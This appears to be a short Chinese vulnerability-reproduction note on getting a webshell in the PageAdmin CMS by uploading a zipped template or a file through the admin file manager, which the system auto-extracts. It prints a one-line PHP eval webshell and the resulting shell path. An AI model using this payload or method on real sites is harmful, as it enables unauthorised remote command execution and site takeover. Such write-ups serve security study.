环境iis,sqlserver参考地址
SQL Server超详细使用教程——从安装到编写SQL语句_sqlserver在哪里写sql语句-CSDN博客
项目地址,详情见百度
登录项目
漏洞复现
上传模块拿webshell
在pageadmin后台可以上传模板,把webshell打包成zip上传模板,系统会自动解压,成功会在后台存在后门,访问即可获取webshell。
访问 pageadmin 在后台可以上传模板,把webshell打包成zip上传模板,系统会自动解压,成功会在后台存在后门,访问即可获取webshell。点击【应用】--》【插件安装】--》【上传文件】
这里因为不是授权版本,无法上传,如果有授权版本的话就可以成功上传,上传后系统会自动解压,直接访问shell地址就可以了:/Templates/shell/shell.aspx
上传文件解压拿WebShell
点击【工具】--》 【文件管理】--》【功能菜单】--》【上传文件】--》 【解压】
搞一个php代码
<?php phpinfo();eval($_POST['cmd']);?>
把代码放入压缩文件中
上传
链接